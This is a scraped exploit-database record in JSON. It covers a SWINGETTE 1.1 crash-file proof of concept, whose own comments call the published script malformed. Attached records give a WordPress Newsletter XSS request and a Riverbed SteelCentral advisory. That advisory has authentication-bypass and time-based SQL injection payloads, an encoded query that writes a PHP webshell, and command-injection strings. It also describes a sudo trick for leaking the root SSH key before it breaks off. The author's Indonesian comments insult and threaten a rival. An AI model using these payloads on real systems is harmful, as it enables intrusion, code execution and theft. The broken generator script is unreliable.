ID 1337DAY-ID-9625 Type zdt Reporter cr4wl3r Modified 2010-03-15T00:00:00
Description
Exploit for the Windows platform, category: DoS / proof of concept
================================================
SWINGETTE 1.1 (.mp3) Buffer Overflow DOS Exploit
================================================
# SWINGETTE 1.1 (.mp3) Buffer Overflow DOS Exploit
# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0 _ __ __ __ 1
# 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
# 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
# 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
# 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
# 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
# 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
# 1 \ \____/ >> Exploit database separated by exploit 0
# 0 \/___/ type (local, remote, DoS, etc.) 1
# 1 1
# 0 [+] Site : Inj3ct0r.com 0
# 1 [+] Support e-mail : submit[at]inj3ct0r.com 1
# 0 0
# 1 ###################################### 1
# 0 I'm cr4wl3r member from Inj3ct0r Team 1
# 1 ###################################### 0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By: cr4wl3r
#
# Purpose (per the advisory title): a proof-of-concept file generator
# for a crash / denial-of-service condition in the SWINGETTE 1.1 media
# player. The script writes a single output file, "sploit.mp3", in the
# current working directory; it takes no arguments and produces no
# other output.
#
# What the payload bytes are: \x4D\x54\x68\x64 is ASCII "MThd", the
# header-chunk tag of a Standard MIDI File, and \x00\x00\x00\x06 is
# presumably the 6-byte MThd chunk length. The file is therefore not
# MPEG audio at all (no ID3 tag, no MPEG frame sync) -- it is runs of
# NUL/0x06 bytes followed by repeated MIDI header tags, saved under a
# .mp3 name. For triage/detection, that mismatch between the extension
# and the leading bytes is the distinguishing trait of this sample.
#
# NOTE(review): as published the script looks malformed -- the four
# print statements appear before the open() that creates the "mp3"
# filehandle, and the first print ends in "." rather than ";". Whether
# the described file is actually produced by this listing as-is is
# unclear; treat it as a description of the crash input rather than a
# working generator.
print mp3 "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00".
# Four copies of the "MThd" tag (see the header comment above).
print mp3 "\x4D\x54\x68\x64";
print mp3 "\x4D\x54\x68\x64";
print mp3 "\x4D\x54\x68\x64";
print mp3 "\x4D\x54\x68\x64";
# ">" truncates/creates sploit.mp3 in the current directory.
open(mp3, ">sploit.mp3");
# The remaining lines are the original author's off-topic personal
# remarks (Indonesian slang); they carry no technical content and are
# left as found.
# Note: dapet email account doank??? bruakakaka. eh njing loe tanya aja ama FO nya langsung. gw dapet apa???
# bukannya loe yang ngirim email ama FOnya buat ngelink web loe??? sampe skrng engga direp ama FO nya. krna dia tau loe itu dodol.
# loe bilang apa??? keluarga gw??? wkwkwkwkwk. loe aja belum lepas netek dari mak loe mau ngajak berantem???
# eh njink gw tau loe dimana skrng.
# gw ama temen forum gw??? tuh liahat aja siapa special Greets noh??? yang paling ujung tuh siapa??? dia anak forum gw njing, dan smpe itu loe minta2 ampun ama dia krna blog loe engga hidup2 lagi ampe skrng.
# masih mau belagu loe njing??? badan hanya tinggal bonus gitu engga usah belagu.
# 0day.today [2018-03-09] #
{"id": "1337DAY-ID-9625", "bulletinFamily": "exploit", "title": "SWINGETTE 1.1 (.mp3) Buffer Overflow DOS Exploit", "description": "Exploit for windows platform in category dos / poc", "published": "2010-03-15T00:00:00", "modified": "2010-03-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/9625", "reporter": "cr4wl3r", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-03-09T23:25:36", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for windows platform in category dos / poc", "edition": 1, "enchantments": {"score": {"modified": "2016-04-19T10:09:20", "value": 5.1}}, "hash": "e36ab94f083b500afb79755656dfb551465163851c1bf33665993519ce778208", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "bb737bc4bf8bc1b3d7d0c0b68d280a00", "key": "href"}, {"hash": "a627c6235b9868e980bce33f303a134d", "key": "sourceData"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "2334125181df3b2c18b2086aff8b0171", "key": "reporter"}, {"hash": "19868d9c78f497967ef311abb34a40d5", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "04209fa43b7a09fb0f0a8e3c734aff97", "key": "title"}, {"hash": "7d9a4832ee8565d2919a39f12747188c", "key": "sourceHref"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "19868d9c78f497967ef311abb34a40d5", "key": "published"}], "history": [], "href": "http://0day.today/exploit/description/9625", "id": "1337DAY-ID-9625", "lastseen": "2016-04-19T10:09:20", "modified": "2010-03-15T00:00:00", "objectVersion": "1.0", "published": "2010-03-15T00:00:00", "references": [], "reporter": "cr4wl3r", "sourceData": 
"================================================\r\nSWINGETTE 1.1 (.mp3) Buffer Overflow DOS Exploit\r\n================================================\r\n\r\n# SWINGETTE 1.1 (.mp3) Buffer Overflow DOS Exploit\r\n\r\n# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n# 0 _ __ __ __ 1\r\n# 1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n# 0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n# 1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n# 0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n# 1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n# 0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n# 1 \\ \\____/ >> Exploit database separated by exploit 0\r\n# 0 \\/___/ type (local, remote, DoS, etc.) 1\r\n# 1 1\r\n# 0 [+] Site : Inj3ct0r.com 0\r\n# 1 [+] Support e-mail : submit[at]inj3ct0r.com 1\r\n# 0 0\r\n# 1 ###################################### 1\r\n# 0 I'm cr4wl3r member from Inj3ct0r Team 1\r\n# 1 ###################################### 0\r\n# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n#[+] Discovered By: cr4wl3r\r\n\r\n\r\nprint mp3 
\"\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\".\r\nprint mp3 \"\\x4D\\x54\\x68\\x64\";\r\nprint mp3 \"\\x4D\\x54\\x68\\x64\";\r\nprint mp3 \"\\x4D\\x54\\x68\\x64\";\r\nprint mp3 \"\\x4D\\x54\\x68\\x64\";\r\nopen(mp3, \">sploit.mp3\");\r\n\r\n\r\n# Note: dapet email account doank??? bruakakaka. eh njing loe tanya aja ama FO nya langsung. gw dapet apa???\r\n# bukannya loe yang ngirim email ama FOnya buat ngelink web loe??? sampe skrng engga direp ama FO nya. krna dia tau loe itu dodol.\r\n# loe bilang apa??? keluarga gw??? wkwkwkwkwk. loe aja belum lepas netek dari mak loe mau ngajak berantem???\r\n# eh njink gw tau loe dimana skrng. \r\n# gw ama temen forum gw??? tuh liahat aja siapa special Greets noh??? yang paling ujung tuh siapa??? dia anak forum gw njing, dan smpe itu loe minta2 ampun ama dia krna blog loe engga hidup2 lagi ampe skrng.\r\n# masih mau belagu loe njing??? 
badan hanya tinggal bonus gitu engga usah belagu.\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "sourceHref": "http://0day.today/exploit/9625", "title": "SWINGETTE 1.1 (.mp3) Buffer Overflow DOS Exploit", "type": "zdt", "viewCount": 0}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T10:09:20"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "b0d3d3a91f21189719037cf41ad6dbfa"}, {"key": "href", "hash": "555c5a63bf9ec8f4036cd17c3a89f3a4"}, {"key": "modified", "hash": "19868d9c78f497967ef311abb34a40d5"}, {"key": "published", "hash": "19868d9c78f497967ef311abb34a40d5"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "2334125181df3b2c18b2086aff8b0171"}, {"key": "sourceData", "hash": "b1d7c856a4eefc7332f34595a90e860b"}, {"key": "sourceHref", "hash": "13909a85079f11bb524b017f0b384363"}, {"key": "title", "hash": "04209fa43b7a09fb0f0a8e3c734aff97"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "f7ff26d7fae8af979648f5346b9f98491591dee1941e0dabd04728e6a327ef10", "viewCount": 0, "enchantments": {"vulnersScore": 10.0}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/9625", "sourceData": "================================================\r\nSWINGETTE 1.1 (.mp3) Buffer Overflow DOS Exploit\r\n================================================\r\n\r\n# SWINGETTE 1.1 (.mp3) Buffer Overflow DOS Exploit\r\n\r\n# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n# 0 _ __ __ __ 1\r\n# 1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n# 0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n# 1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n# 0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ 
\\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n# 1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n# 0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n# 1 \\ \\____/ >> Exploit database separated by exploit 0\r\n# 0 \\/___/ type (local, remote, DoS, etc.) 1\r\n# 1 1\r\n# 0 [+] Site : Inj3ct0r.com 0\r\n# 1 [+] Support e-mail : submit[at]inj3ct0r.com 1\r\n# 0 0\r\n# 1 ###################################### 1\r\n# 0 I'm cr4wl3r member from Inj3ct0r Team 1\r\n# 1 ###################################### 0\r\n# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n#[+] Discovered By: cr4wl3r\r\n\r\n\r\nprint mp3 \"\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\".\r\nprint mp3 \"\\x4D\\x54\\x68\\x64\";\r\nprint mp3 \"\\x4D\\x54\\x68\\x64\";\r\nprint mp3 \"\\x4D\\x54\\x68\\x64\";\r\nprint mp3 \"\\x4D\\x54\\x68\\x64\";\r\nopen(mp3, \">sploit.mp3\");\r\n\r\n\r\n# Note: dapet email account doank??? bruakakaka. eh njing loe tanya aja ama FO nya langsung. gw dapet apa???\r\n# bukannya loe yang ngirim email ama FOnya buat ngelink web loe??? sampe skrng engga direp ama FO nya. krna dia tau loe itu dodol.\r\n# loe bilang apa??? keluarga gw??? wkwkwkwkwk. 
loe aja belum lepas netek dari mak loe mau ngajak berantem???\r\n# eh njink gw tau loe dimana skrng. \r\n# gw ama temen forum gw??? tuh liahat aja siapa special Greets noh??? yang paling ujung tuh siapa??? dia anak forum gw njing, dan smpe itu loe minta2 ampun ama dia krna blog loe engga hidup2 lagi ampe skrng.\r\n# masih mau belagu loe njing??? badan hanya tinggal bonus gitu engga usah belagu.\r\n\r\n\r\n\n# 0day.today [2018-03-09] #"}
{"result": {"zdt": [{"lastseen": "2018-01-02T17:10:13", "references": [], "description": "Exploit for php platform in category web applications", "edition": 2, "reporter": "Keith Lee", "published": "2016-10-15T00:00:00", "title": "WordPress Newsletter 4.6.0 Cross Site Request Forgery / Cross Site Scripting", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-02T17:10:13", "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N/", "value": 4.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-10-15T00:00:00", "id": "1337DAY-ID-25575", "href": "https://0day.today/exploit/description/25575", "sourceData": "Wordpress Plugin: Newsletter 4.6.0 https://wordpress.org/plugins/newsletter/ is\r\nvulnerable to CSRF and XSS.\r\nThe issue is supposed to be fixed in version 4.6.1 . See\r\nhttps://wordpress.org/plugins/newsletter/changelog/ for more details.\r\n\r\n\r\n1. Stored Cross-Site Scripting (XSS)\r\n\r\nAuthenticated administrators can inject html/js code (there is no CSRF\r\nprotection).\r\n\r\n*Injection Location: *http://localhost/wordpress/wp-admin/admin.php?page=\r\nnewsletter_subscription_lists\r\n*Method: *POST\r\n*Retrieval Location: *http://localhost/wordpress/wp-admin/admin.php?page=\r\nnewsletter_users_massive\r\n*Vulnerable Parameter(s): *\r\noptions[list_1]\r\noptions[list_2]\r\noptions[list_3]\r\noptions[list_4]\r\noptions[list_5]\r\noptions[list_6]\r\noptions[list_7]\r\noptions[list_8]\r\noptions[list_9]\r\noptions[list_10]\r\noptions[list_11]\r\noptions[list_12]\r\noptions[list_13]\r\noptions[list_14]\r\noptions[list_15]\r\noptions[list_16]\r\noptions[list_17]\r\noptions[list_18]\r\noptions[list_19]\r\noptions[list_20]\r\n\r\n*Example Attack:*\r\n*Request:*\r\nPOST /wordpress/wp-admin/admin.php?page=newsletter_subscription_lists\r\nHTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0)\r\nGecko/20100101 Firefox/48.0\r\nAccept: 
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/wordpress/wp-admin/admin.php?page=\r\nnewsletter_subscription_lists\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1762\r\n\r\nact=save&btn=&_wpnonce=7cad5407b5&_wp_http_referer=%2Fwordpress%2Fwp-admin%\r\n2Fadmin.php%3Fpage%3Dnewsletter_subscription_lists&options%5Blist_1%5D=\r\ntest&options%5Blist_1_status%5D=1&options%5Blist_1_checked%\r\n5D=1&options%5Blist_2%5D=&options%5Blist_2_status%5D=0&\r\noptions%5Blist_2_checked%5D=0&options%5Blist_3%5D=&options%\r\n5Blist_3_status%5D=0&options%5Blist_3_checked%5D=0&options%\r\n5Blist_4%5D=&options%5Blist_4_status%5D=0&options%5Blist_4_\r\nchecked%5D=0&options%5Blist_5%5D=&options%5Blist_5_status%\r\n5D=0&options%5Blist_5_checked%5D=0&options%5Blist_6%5D=&\r\noptions%5Blist_6_status%5D=0&options%5Blist_6_checked%5D=0&\r\noptions%5Blist_7%5D=bi1x5<script>alert('spiderlabs')<%\r\n2fscript>gjoce&options%5Blist_7_status%5D=0&options%5Blist_\r\n7_checked%5D=0&options%5Blist_8%5D=&options%5Blist_8_status%\r\n5D=0&options%5Blist_8_checked%5D=0&options%5Blist_9%5D=&\r\noptions%5Blist_9_status%5D=0&options%5Blist_9_checked%5D=0&\r\noptions%5Blist_10%5D=&options%5Blist_10_status%5D=0&options%\r\n5Blist_10_checked%5D=0&options%5Blist_11%5D=&options%\r\n5Blist_11_status%5D=0&options%5Blist_11_checked%5D=0&\r\noptions%5Blist_12%5D=&options%5Blist_12_status%5D=0&options%\r\n5Blist_12_checked%5D=0&options%5Blist_13%5D=&options%\r\n5Blist_13_status%5D=0&options%5Blist_13_checked%5D=0&\r\noptions%5Blist_14%5D=&options%5Blist_14_status%5D=0&options%\r\n5Blist_14_checked%5D=0&options%5Blist_15%5D=&options%\r\n5Blist_15_status%5D=0&options%5Blist_15_checked%5D=0&\r\noptions%5Blist_16%5D=&options%5Blist_16_status%5D=0&options%\r\n5Blist_16_checked%5D=0&options%5Blist_17%5D=&options%\r\n5Blist_17_status%5D=0&options%5
Blist_17_checked%5D=0&\r\noptions%5Blist_18%5D=&options%5Blist_18_status%5D=0&options%\r\n5Blist_18_checked%5D=0&options%5Blist_19%5D=&options%\r\n5Blist_19_status%5D=0&options%5Blist_19_checked%5D=0&\r\noptions%5Blist_20%5D=&options%5Blist_20_status%5D=0&options%\r\n5Blist_20_checked%5D=0\r\n\r\n*Response:*\r\nHTTP/1.1 200 OK\r\nDate: Wed, 28 Sep 2016 17:40:12 GMT\r\nServer: Apache\r\nX-Powered-By: PHP/7.0.10\r\nExpires: Wed, 11 Jan 1984 05:00:00 GMT\r\nCache-Control: no-cache, must-revalidate, max-age=0\r\nX-Frame-Options: SAMEORIGIN\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 102536\r\n\r\n*Request:*\r\nGET /wordpress/wp-admin/admin.php?page=newsletter_users_massive HTTP/1.1\r\nHost: localhost:8888\r\nAccept: */*\r\nAccept-Language: en\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;\r\nTrident/5.0)\r\nConnection: close\r\nReferer: http://localhost:8888/wordpress/wp-admin/admin.php?\r\npage=newsletter_users_massive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n*Response:*\r\nHTTP/1.1 200 OK\r\nDate: Wed, 28 Sep 2016 17:40:37 GMT\r\nServer: Apache\r\nX-Powered-By: PHP/7.0.10\r\nExpires: Wed, 11 Jan 1984 05:00:00 GMT\r\nCache-Control: no-cache, must-revalidate, max-age=0\r\nX-Frame-Options: SAMEORIGIN\r\nX-UA-Compatible: IE=edge\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 98989\r\n\r\nFor preference <select id=\"options-list\" name=\"options[list]\"><option\r\nvalue=\"1\">(1) test</option><option value=\"2\">(2) </option><option\r\nvalue=\"3\">(3) </option><option value=\"4\">(4) </option><option value=\"5\">(5)\r\n</option><option value=\"6\">(6) </option><option value=\"7\">(7)\r\nbi1x5<script>alert('spiderlabs')</script>gjoce</option><option\r\nvalue=\"8\">(8)\r\n\r\n*Vulnerable PHP Code*\r\n/newsletter/subscription/lists.php:51,52\r\n/users/massive.php\r\n\r\n-- \r\nRegards,\r\nKeith Lee\n\n# 0day.today [2018-01-02] #", 
"cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25575"}, {"lastseen": "2018-02-07T01:07:31", "references": [], "description": "Exploit for php platform in category web applications", "edition": 2, "reporter": "Security-Assessment", "published": "2016-06-27T00:00:00", "title": "Riverbed SteelCentral NetProfiler & NetExpress 10.8.7 - Multiple Vulnerabilities", "type": "zdt", "enchantments": {"score": {"modified": "2018-02-07T01:07:31", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/", "value": 3.3}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-06-27T00:00:00", "id": "1337DAY-ID-25136", "href": "https://0day.today/exploit/description/25136", "sourceData": "Riverbed SteelCentral NetProfiler & NetExpress Multiple Vulnerabilities\r\nAffected versions: SteelCentral NetProfiler <= 10.8.7 & SteelCentral\r\nNetExpress <= 10.8.7\r\n \r\nPDF:\r\nhttp://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf\r\n \r\n+-----------+\r\n|Description|\r\n+-----------+\r\nThe Riverbed SteelCentral NetProfiler and NetExpress virtual appliances,\r\nwhich share the same code base, are affected by multiple security\r\nvulnerabilities, including authentication bypass, SQL injection,\r\narbitrary code execution via command injection, privilege escalation,\r\nlocal file inclusion, account hijacking and hardcoded default\r\ncredentials. Details for other low severity vulnerabilities (i.e.\r\ncross-site scripting) are available in the accompanying PDF.\r\n \r\n+------------+\r\n|Exploitation|\r\n+------------+\r\n==SQL Injection==\r\nThe \u2018username\u2019 POST parameter in the login method of the common REST API\r\nis vulnerable to SQL injection via stacked queries. An attacker can\r\nexploit this vulnerability to add a user account in the application\u2019s\r\nPostgreSQL database and successfully bypass authentication. 
The\r\nexploitation of this vulnerability can also be replicated from the main\r\nweb GUI login functionality as login calls are routed to the same common\r\nREST API web service.\r\n \r\nThe proof-of-concept request below shows how to exploit the SQL\r\ninjection vulnerability to add a malicious user account into the \u2018users\u2019\r\ntable of the application database. Since quote characters can't be used\r\nas part of the injection payload, an attacker needs to use string\r\nconcatenation to insert the field values (i.e. 'user' =>\r\nCHR(117)||CHR(115)||CHR(101)||CHR(114)).\r\n \r\n[POC SQL INJECTION - INSERT USER]\r\nMethod => POST\r\nURL => /api/common/1.0/login\r\nContent-type => application/json\r\nPayload => {\r\n \"username\": \"test%';INSERT INTO users (username, password, uid) VALUES\r\n(<user>, <SHA512 hash>, <random id>);--\",\r\n \"password\": \"\"\r\n}\r\n \r\nAdditional SQL Injection vulnerabilities exist in the application\u2019s web\r\ninterface and can be exploited after authentication.\r\n \r\nMethod => GET\r\nURL => /popup.php?page=export_report\r\nParameter => report_id\r\nPOC Payload => 1';SELECT PG_SLEEP(5)--\r\n \r\nMethod => GET\r\nURL => /popup.php?page=algorithm_settings\r\nParameter => id\r\nPOC Payload => 1';SELECT PG_SLEEP(5)-- \r\n \r\nMethod => POST\r\nURL => /index.php?page=port_config\r\nParameter => PortsSelectControl/ports_config/port_names\r\nPOC Payload => ') AND 9625=(SELECT 9625 FROM PG_SLEEP(5)) AND\r\n('Pdyu'='Pdyu \r\n \r\nMethod => POST\r\nURL => /index.php?page=port_config\r\nParameter => PortsSelectControl/ports_config/port_numbers\r\nPOC Payload => 1-100) AND 5045=(SELECT 5045 FROM PG_SLEEP(5)) AND (2272=2272\r\n \r\nMethod => POST\r\nURL => /index.php?page=port_config\r\nParameter => PortsSelectControl/ports_config/port_proto\r\nPOC Payload => ');SELECT PG_SLEEP(5)--\r\n \r\nAll the SQL injections above can be trivially exploited to write\r\nmalicious PHP code into a directory under the application web 
root\r\nfolder, such as one used for file uploads, and obtain arbitrary code\r\nexecution.\r\n \r\n[POC SQL INJECTION - WRITE WEBSHELL] \r\nGET\r\n/popup.php?page=export_report&report_id=1';COPY+(SELECT+CHR(60)||CHR(63)||CHR(112)\r\n||CHR(104)||CHR(112)||CHR(32)||CHR(101)||CHR(99)||CHR(104)||CHR(111)||CHR(32)||CHR(115)\r\n||CHR(121)||CHR(115)||CHR(116)||CHR(101)||CHR(109)||CHR(40)||CHR(36)||CHR(95)||CHR(71)\r\n||CHR(69)||CHR(84)||CHR(91)||CHR(34)||CHR(99)||CHR(109)||CHR(100)||CHR(34)||CHR(93)\r\n||CHR(41)||CHR(59)||CHR(32)||CHR(63)||CHR(62))+TO+$$/usr/mazu/www/tmp/imports/shell.php$$;--\r\n&export_type=3\r\n \r\n \r\n==Command Injection==\r\nMultiple command injection vulnerabilities exist in the appliances\u2019 web\r\ninterfaces due to unsanitized user-supplied input passed as argument to\r\nshell functions. An attacker can exploit these vulnerabilities to inject\r\nshell commands and obtain arbitrary code execution.\r\n \r\nURL => GET\r\n/popup.php?page=test_connection&device=<PAYLOAD>&type=switch\r\nParameter => device\r\nPOC Payload => 1; touch /tmp/FILE;\r\n \r\nURL => POST /index.php?page=licenses\r\nBody => xjxfun=get_request_key&xjxr=<value>&xjxargs[]=<PAYLOAD>\r\nParameter => xjxargs[]\r\nPOC Payload => LICENSE-TOKEN; id;\r\nNotes => Token Request functionality in 'Licenses' page\r\n \r\nURL => GET /popup.php?page=packet_export&query=<PAYLOAD>\r\nParameter => query\r\nPOC Payload => 1; touch /tmp/MYFILE;\r\n \r\nURL => POST /index.php?page=network_config\r\nBody => <configuration params>&Setup/setup/network_hostname=<PAYLOAD>\r\nParameter => Setup/setup/network_hostname\r\nPOC Payload => 1; touch /tmp/MYFILE;\r\nNotes => 'Configure now' functionality, injection occurs after\r\nappliance reboots.\r\n \r\nURL => POST /index.php?page=product_info\r\nBody => xjxfun=delete_collect&&xjxr=<value>&xjxargs[]=<PAYLOAD>\r\nParameter => xjxargs[]\r\nPOC Payload => 1; touch /tmp/MYFILE;\r\nNotes => 'Delete collected entry' functionality\r\n \r\n==Privilege 
Escalation==\r\nAn insecure configuration of the /etc/sudoers file allows privilege\r\nescalation to root. The \u2018apache\u2019 user is allowed to run multiple scripts\r\nunder the /usr/mazu/bin directory without being prompted for a password,\r\nincluding the following sudoers entry:\r\n \r\n/usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date*\r\n \r\nThe \u2018mazu-run\u2019 script can be used to invoke the /bin/date binary in the\r\ncontext of the built-in \u2018mazu\u2019 user. An attacker can abuse the mazu-run\r\nscript to run the /bin/date binary with the \u2013f flag against a sensitive\r\nfile such as the root private SSH key. The \u2018\u2013f\u2019 option instructs the\r\n\u2018date\u2019 binary to parse the file specified as a DATEFILE. By default, the\r\ncommand \u2018date\u2019 will echo back an error message with the contents of the\r\nspecified file when this does not comply with a valid DATEFILE format.\r\nThis technique can be exploited to get the root SSH private RSA key and\r\nwrite it into the appliance filesystem using output redirection. An\r\nattacker can then establish a SSH connection to the target system by\r\nusing the dumped private key to authenticate as root and spawn a root\r\nreverse shell. The POC payload below shows how to exploit the vulnerability.\r\n \r\n[POC PRIVILEGE ESCALATION]\r\nsudo -u mazu 